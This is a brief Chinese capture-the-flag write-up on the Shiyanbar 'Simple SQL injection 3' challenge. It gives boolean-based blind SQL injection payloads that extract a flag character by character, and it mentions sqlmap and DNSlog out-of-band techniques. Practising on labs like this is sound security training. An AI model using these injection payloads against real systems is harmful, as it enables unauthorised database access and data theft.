实验吧 简单的SQL注入3

首先还是晒一下题目：

判断是否存在注入

我们还是来判断一下是否存在注入，输入1'发现会提示语法错误，说明存在注入。

判断过滤

输入1，页面显示Hello!；
输入2，页面显示Hello!；
输入12，页面显示为空；
输入union select flag from flag，显示为Hello!；
基于此，可以大胆推断，只有能查询到结果，就显示Hello!；反之则显示为空。
因此，我们可以从存在即返回hello这点来出发。
我们来查询flag中是否存在某些字符：
比如:
1>=select count(*) from flag where left(flag,1)='f'，判断flag的第一个字符是否是'f'；
1>=select count(*) from flag where left(flag,2)='fl'，判断flag的前两个字符是否是'fl'；
以此类推，只要写一个简单的Python脚本来遍历所有的可能的字母即可。

ps:
可以直接使用sqlmap跑结果；
还有一种比较简单的手工方法是配合dnslog进行带外攻击。